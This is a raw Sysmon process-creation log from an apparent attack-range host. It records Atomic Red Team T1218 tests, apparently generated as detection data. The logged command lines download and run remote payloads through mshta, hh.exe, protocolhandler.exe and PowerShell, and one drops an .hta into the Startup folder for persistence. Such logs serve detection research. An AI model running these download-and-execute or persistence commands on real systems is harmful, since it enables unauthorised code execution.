154100x80000000000000007459362Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:34:04.384{C2494F38-101C-62CF-3455-000000006202}492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "FOR /F "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%%b & call "%%microsoft_wordpath%%\protocolhandler.exe" "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{C2494F38-86EE-62CC-6F04-000000006202}3056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000007451696Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:31:52.148{C2494F38-0F98-62CF-EB54-000000006202}8080C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\system32\mshta.exe" "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta"C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC{C2494F38-0F8F-62CF-C654-000000006202}7112C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -EmbeddingNT AUTHORITY\NETWORK SERVICE 154100x80000000000000007450051Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:31:50.607{C2494F38-0F96-62CF-DD54-000000006202}5632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-86EE-62CC-6F04-000000006202}3056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000007443875Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:31:41.368{C2494F38-0F8D-62CF-B054-000000006202}6848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$var =Invoke-WebRequest \""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"" $var.content|out-file \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\"" mshta \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\""}C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{C2494F38-86EE-62CC-6F04-000000006202}3056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000007443079Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:31:36.776{C2494F38-0F88-62CF-AA54-000000006202}6136C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC{C2494F38-0F88-62CF-A854-000000006202}6688C:\Windows\System32\cmd.exe"cmd.exe" /c "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"WIN-HOST-MHAAG-\Administrator 154100x80000000000000007443011Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:31:36.717{C2494F38-0F88-62CF-A854-000000006202}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{C2494F38-86EE-62CC-6F04-000000006202}3056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000007425249Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:25:18.973{C2494F38-0E0E-62CF-1D54-000000006202}4716C:\Windows\hh.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft® HTML Help ExecutableHTML HelpMicrosoft CorporationHH.exehh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chmC:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=52AFE6DE5E463B7A08C184B1EB49DD6A,SHA256=9823D79E936B57C94BFB84383CC708BFC15D1D16E67F6CB119B60F28B01BFA63{C2494F38-0E0E-62CF-1B54-000000006202}6176C:\Windows\System32\cmd.exe"cmd.exe" /c "hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm"WIN-HOST-MHAAG-\Administrator 154100x80000000000000007425207Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-117-2022-07-13 18:25:18.931{C2494F38-0E0E-62CF-1B54-000000006202}6176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{C2494F38-6F10-62CC-9353-070000000000}0x753932HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{C2494F38-86EE-62CC-6F04-000000006202}3056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator